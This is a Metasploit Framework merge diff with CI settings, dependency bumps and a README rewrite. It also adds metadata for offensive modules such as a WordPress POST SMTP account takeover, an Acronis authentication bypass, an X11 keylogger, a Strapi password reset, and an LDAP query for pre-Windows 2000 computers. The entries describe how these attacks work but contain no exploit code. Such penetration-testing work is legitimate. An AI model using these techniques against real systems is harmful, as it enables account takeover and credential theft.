automatic module_metadata_base.json update

Merge pull request #19460 from gardnerapp/game_overlay
Land #19460, CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privilege Escalation
2024-12-18 20:51:38 +00:00 · 2024-12-18 14:44:57 -06:00 · 2024-12-18 14:08:10 -06:00 · 2024-12-18 12:41:54 +00:00 · 2024-12-18 12:35:12 +00:00 · 2024-12-18 12:44:34 +01:00
222 changed files with 24557 additions and 2511 deletions
@@ -32,7 +32,7 @@ jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -44,7 +44,7 @@ on:
 jobs:
  ldap:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -29,7 +29,7 @@ on:
 jobs:
  msftidy:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    env:
      BUNDLE_WITHOUT: "coverage development pcap"
@@ -44,7 +44,7 @@ on:
 jobs:
  mssql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mssql:
@@ -44,7 +44,7 @@ on:
 jobs:
  mysql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mysql:
@@ -44,7 +44,7 @@ on:
 jobs:
  postgres:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -54,7 +54,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: password
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -17,7 +17,7 @@ on:
 jobs:
  smb:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -29,7 +29,7 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60
    name: Docker Build
    steps:
      - name: Checkout code
@@ -41,7 +41,7 @@ jobs:

  test:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -51,7 +51,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: postgres
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -17,6 +17,7 @@ todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
 dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
+msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -121,6 +122,7 @@ m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
 Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
 Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
+mwalas-r7 <mwalas-r7@github>           <marcin_walas@rapid7.com>
 net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
@@ -185,4 +187,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.35)
+    metasploit-framework (6.4.41)
      aarch64
      abbrev
      actionpack (~> 7.0.0)
@@ -42,7 +42,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.187)
+      metasploit-payloads (= 2.0.189)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.35)
      mqtt
@@ -300,7 +300,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.187)
+    metasploit-payloads (2.0.189)
    metasploit_data_models (6.0.5)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -439,7 +439,7 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.12)
+    rex-random_identifier (0.1.13)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
@@ -499,11 +499,11 @@ GEM
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.10)
+    ruby_smb (3.3.13)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
-      rubyntlm
+      rubyntlm (>= 0.6.5)
      windows_error (>= 0.1.4)
    rubyntlm (0.6.5)
      base64
@@ -88,9 +88,9 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.3, "New BSD"
 metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.35, "New BSD"
+metasploit-framework, 6.4.41, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.187, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
@@ -156,7 +156,7 @@ rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
 rex-powershell, 0.1.100, "New BSD"
-rex-random_identifier, 0.1.12, "New BSD"
+rex-random_identifier, 0.1.13, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
 rex-socket, 0.1.57, "New BSD"
@@ -181,7 +181,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.10, "New BSD"
+ruby_smb, 3.3.13, "New BSD"
 rubyntlm, 0.6.5, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -1,52 +1,45 @@
-Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
-==
-The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+# Metasploit Framework

-The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
+The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.

-You can find documentation on Metasploit and how to use it at:
- https://docs.metasploit.com/
+## Latest Version
+Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.

-Information about setting up a development environment can be found at:
- https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+## Documentation
+Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).

-Our bug and feature request tracker can be found at:
- https://github.com/rapid7/metasploit-framework/issues
+## Development Environment
+To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).

-New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+## Bug and Feature Requests
+Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).

-API documentation for writing modules can be found at:
-  https://docs.metasploit.com/api/
+## API Documentation
+For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+## Support and Communication
+For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.

-Installing
--
+## Installing Metasploit

-Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
-which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
-you'd like to deal with dependencies on your own.
+### Recommended Installation

-Using Metasploit
--
-Metasploit can do all sorts of things. The first thing you'll want to do
-is start `msfconsole`, but after that, you'll probably be best served by
-reading the basics of [using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-or [Metasploit Unleashed][unleashed].
+We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.

-Contributing
--
-See the [Dev Environment Setup][devenv] guide on GitHub, which will
-walk you through the whole process from installing all the
-dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more information, see
-[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.

+## Using Metasploit

-[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+To get started with Metasploit:

+1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
+2. **Explore Resources:** 
+   - Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.

+## Contributing
+
+To contribute to Metasploit:
+
+1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
+2. **Clone the Repository:** Obtain the source code from the official repository.
+3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
@@ -373,3 +373,17 @@ queries:
      - https://malicious.link/post/2022/ldapsearch-reference/
      - https://burmat.gitbook.io/security/hacking/domain-exploitation
      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_PRE_WINDOWS_2000_COMPUTERS
+    description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
+    filter: '(&(userAccountControl=4128))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - logonCount
+      - userAccountControl
+    references:
+      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
+      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
@@ -65,3 +65,7 @@ hash-form
 give
 ultimate-member
 wp-fastest-cache
+post-smtp
+really-simple-ssl
+perfect-survey
+wp-time-capsule
@@ -1,2 +1,10 @@
-Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
-`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
+This directory contains the following files:
+
+- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
+- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
+  This file is auto-generated from the current state of the database.
+
+`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new 
+database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your 
+migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or 
+application code. We _strongly_ recommend that you check this file into your version control system.
@@ -771,7 +771,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-04-26 12:33:43 +0000",
+    "mod_time": "2024-11-12 12:08:18 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/cve_2022_26923_certifried",
@@ -874,20 +874,21 @@
      }
    ]
  },
-  "auxiliary_admin/dcerpc/samr_computer": {
-    "name": "SAMR Computer Management",
-    "fullname": "auxiliary/admin/dcerpc/samr_computer",
+  "auxiliary_admin/dcerpc/samr_account": {
+    "name": "SAMR Account Management",
+    "fullname": "auxiliary/admin/dcerpc/samr_account",
    "aliases": [
-
+      "auxiliary/admin/dcerpc/samr_computer"
    ],
    "rank": 300,
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
      "JaGoTu",
-      "Spencer McIntyre"
+      "Spencer McIntyre",
+      "smashery"
    ],
-    "description": "Add, lookup and delete computer / machine accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "description": "Add, lookup and delete user / machine accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain (MachineAccountQuota). Administrative privileges however are required\n          to delete the created accounts, or to create/delete user accounts.",
    "references": [
      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
    ],
@@ -903,10 +904,10 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-04-16 16:43:30 +0000",
-    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
+    "mod_time": "2024-12-09 08:49:04 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/samr_account.rb",
    "is_install_path": true,
-    "ref_name": "admin/dcerpc/samr_computer",
+    "ref_name": "admin/dcerpc/samr_account",
    "check": false,
    "post_auth": false,
    "default_credential": false,
@@ -919,6 +920,10 @@
      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "AKA": [
+        "samr_computer",
+        "samr_user"
      ]
    },
    "session_types": [
@@ -931,12 +936,16 @@
        "description": "Add a computer account"
      },
      {
-        "name": "DELETE_COMPUTER",
-        "description": "Delete a computer account"
+        "name": "ADD_USER",
+        "description": "Add a user account"
      },
      {
-        "name": "LOOKUP_COMPUTER",
-        "description": "Lookup a computer account"
+        "name": "DELETE_ACCOUNT",
+        "description": "Delete a computer or user account"
+      },
+      {
+        "name": "LOOKUP_ACCOUNT",
+        "description": "Lookup a computer or user account"
      }
    ]
  },
@@ -6188,6 +6197,67 @@

    ]
  },
+  "auxiliary_admin/http/wp_post_smtp_acct_takeover": {
+    "name": "Wordpress POST SMTP Account Takeover",
+    "fullname": "auxiliary/admin/http/wp_post_smtp_acct_takeover",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-01-10",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Ulysses Saicha"
+    ],
+    "description": "The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege\n          escalation where an unauthenticated user is able to reset the password\n          of an arbitrary user. This is done by requesting a password reset, then\n          viewing the latest email logs to find the associated password reset email.",
+    "references": [
+      "CVE-2023-6875",
+      "URL-https://github.com/UlyssesSaicha/CVE-2023-6875/tree/main"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-11-28 13:18:47 +0000",
+    "path": "/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/wp_post_smtp_acct_takeover",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/http/wp_symposium_sql_injection": {
    "name": "WordPress Symposium Plugin SQL Injection",
    "fullname": "auxiliary/admin/http/wp_symposium_sql_injection",
@@ -6445,7 +6515,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-02 15:29:47 +0000",
+    "mod_time": "2024-11-18 15:32:08 +0000",
    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/get_ticket",
@@ -6777,6 +6847,66 @@
      }
    ]
  },
+  "auxiliary_admin/ldap/change_password": {
+    "name": "Change Password",
+    "fullname": "auxiliary/admin/ldap/change_password",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "smashery"
+    ],
+    "description": "This module allows Active Directory users to change their own passwords, or reset passwords for\n          accounts they have privileges over.",
+    "references": [
+      "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py",
+      "URL-https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2024-12-06 16:47:25 +0000",
+    "path": "/modules/auxiliary/admin/ldap/change_password.rb",
+    "is_install_path": true,
+    "ref_name": "admin/ldap/change_password",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": [
+      "ldap"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "CHANGE",
+        "description": "Change the user's password, knowing the existing password"
+      },
+      {
+        "name": "RESET",
+        "description": "Reset a target user's password, having permissions over their account"
+      }
+    ]
+  },
  "auxiliary_admin/ldap/rbcd": {
    "name": "Role Base Constrained Delegation",
    "fullname": "auxiliary/admin/ldap/rbcd",
@@ -10421,6 +10551,75 @@
      }
    ]
  },
+  "auxiliary_admin/smb/change_password": {
+    "name": "SMB Password Change",
+    "fullname": "auxiliary/admin/smb/change_password",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "smashery"
+    ],
+    "description": "Change the password of an account using SMB. This provides several different\n          APIs, each of which have their respective benefits and drawbacks.",
+    "references": [
+      "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2024-12-06 14:36:05 +0000",
+    "path": "/modules/auxiliary/admin/smb/change_password.rb",
+    "is_install_path": true,
+    "ref_name": "admin/smb/change_password",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "smb"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "CHANGE",
+        "description": "Change the password, knowing the existing one. New AES kerberos keys will be generated."
+      },
+      {
+        "name": "CHANGE_NTLM",
+        "description": "Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs."
+      },
+      {
+        "name": "RESET",
+        "description": "Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated."
+      },
+      {
+        "name": "RESET_NTLM",
+        "description": "Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs."
+      }
+    ]
+  },
  "auxiliary_admin/smb/check_dir_file": {
    "name": "SMB Scanner Check File/Directory Utility",
    "fullname": "auxiliary/admin/smb/check_dir_file",
@@ -19473,6 +19672,70 @@

    ]
  },
+  "auxiliary_gather/acronis_cyber_protect_machine_info_disclosure": {
+    "name": "Acronis Cyber Protect/Backup machine info disclosure",
+    "fullname": "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Sandro Tolksdorf of usd AG."
+    ],
+    "description": "Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,\n          compute, storage and application resources. Businesses and Service Providers are using it\n          to protect and backup all IT assets in their IT environment.\n          This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect\n          appliance which, in its default configuration, allows the anonymous registration of new\n          backup/protection agents on new endpoints. This API endpoint also generates bearer tokens\n          which the agent then uses to authenticate to the appliance.\n          As the management web console is running on the same port as the API for the agents, this\n          bearer token is also valid for any actions on the web console. This allows an attacker\n          with network access to the appliance to start the registration of a new agent, retrieve\n          a bearer token that provides admin access to the available functions in the web console.\n\n          This module will gather all machine info (endpoints) configured and managed by the appliance.\n          This information can be used in a subsequent attack that exploits this vulnerability to\n          execute arbitrary commands on both the managed endpoint and the appliance.\n          This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.\n\n          Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and\n          Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.",
+    "references": [
+      "CVE-2022-30995",
+      "CVE-2022-3405",
+      "URL-https://herolab.usd.de/security-advisories/usd-2022-0008/",
+      "URL-https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9877,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-11-26 16:10:14 +0000",
+    "path": "/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "gather/acronis_cyber_protect_machine_info_disclosure",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/adobe_coldfusion_fileread_cve_2023_26360": {
    "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read",
    "fullname": "auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360",
@@ -23688,7 +23951,7 @@
      "alanfoster",
      "sjanusz-r7"
    ],
-    "description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n          the different responses returned by the service for valid and invalid users.",
+    "description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n          the different responses returned by the service for valid and invalid users. This module can also detect accounts\n          that are vulnerable to ASREPRoast attacks.",
    "references": [
      "URL-https://nmap.org/nsedoc/scripts/krb5-enum-users.html"
    ],
@@ -23702,7 +23965,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-05-27 13:34:10 +0000",
+    "mod_time": "2024-11-12 13:34:51 +0000",
    "path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
    "is_install_path": true,
    "ref_name": "gather/kerberos_enumusers",
@@ -24076,6 +24339,10 @@
        "name": "ENUM_ORGUNITS",
        "description": "Dump info about all known organizational units in the LDAP environment."
      },
+      {
+        "name": "ENUM_PRE_WINDOWS_2000_COMPUTERS",
+        "description": "Dump info about all computer objects likely created as a \"pre-Windows 2000 computer\", for which the password might be predictable."
+      },
      {
        "name": "ENUM_UNCONSTRAINED_DELEGATION",
        "description": "Dump info about all known objects that allow unconstrained delegation."
@@ -27363,7 +27630,8 @@
    "author": [
      "Alberto Solino",
      "Christophe De La Fuente",
-      "antuache"
+      "antuache",
+      "smashery"
    ],
    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. This is\n          done by remotely updating the registry key security descriptor,\n          taking advantage of the WriteDACL privileges held by local\n          administrators to set temporary read permissions.\n\n          This can be disabled by setting the `INLINE` option to false and the\n          module will fallback to the original implementation, which consists\n          in saving the registry hives locally on the target\n          (%SYSTEMROOT%\\Temp\\<random>.tmp), downloading the temporary hive\n          files and reading the data from it. This temporary files are removed\n          when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
    "references": [
@@ -27381,7 +27649,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-04-30 20:52:23 +0000",
+    "mod_time": "2024-11-15 11:11:41 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -27645,6 +27913,64 @@

    ]
  },
+  "auxiliary_gather/x11_keyboard_spy": {
+    "name": "X11 Keylogger",
+    "fullname": "auxiliary/gather/x11_keyboard_spy",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "1997-07-01",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "nir tzachar"
+    ],
+    "description": "This module binds to an open X11 host to log keystrokes. This is a fairly\n          close copy of the old xspy c program which has been on Kali for a long time.\n          The module works by connecting to the X11 session, creating a background\n          window, binding a keyboard to it and creating a notification alert when a key\n          is pressed.\n\n          One of the major limitations of xspy, and thus this module, is that it polls\n          at a very fast rate, faster than a key being pressed is released (especially before\n          the repeat delay is hit). To combat printing multiple characters for a single key\n          press, repeat characters arent printed when typed in a very fast manor. This is also\n          an imperfect keylogger in that keystrokes arent stored and forwarded but status\n          displayed at poll time. Keys may be repeated or missing.",
+    "references": [
+      "URL-https://www.kali.org/tools/xspy/",
+      "CVE-1999-0526"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 6000,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2024-11-27 14:29:44 +0000",
+    "path": "/modules/auxiliary/gather/x11_keyboard_spy.rb",
+    "is_install_path": true,
+    "ref_name": "gather/x11_keyboard_spy",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "AKA": [
+        "xspy"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/x11/open_x11"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/xbmc_traversal": {
    "name": "XBMC Web Server Directory Traversal",
    "fullname": "auxiliary/gather/xbmc_traversal",
@@ -41979,6 +42305,70 @@

    ]
  },
+  "auxiliary_scanner/http/strapi_3_password_reset": {
+    "name": "Strapi CMS Unauthenticated Password Reset",
+    "fullname": "auxiliary/scanner/http/strapi_3_password_reset",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-02-09",
+    "type": "auxiliary",
+    "author": [
+      "WackyH4cker",
+      "h00die"
+    ],
+    "description": "This module abuses the mishandling of a password reset request for\n          Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.\n\n          Successfully tested against Strapi CMS version 3.0.0-beta.17.4.",
+    "references": [
+      "URL-https://vulners.com/cve/CVE-2019-18818",
+      "URL-https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.4",
+      "URL-https://github.com/strapi/strapi/pull/4443",
+      "CVE-2019-18818",
+      "EDB-50716"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-11-16 15:47:54 +0000",
+    "path": "/modules/auxiliary/scanner/http/strapi_3_password_reset.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/strapi_3_password_reset",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
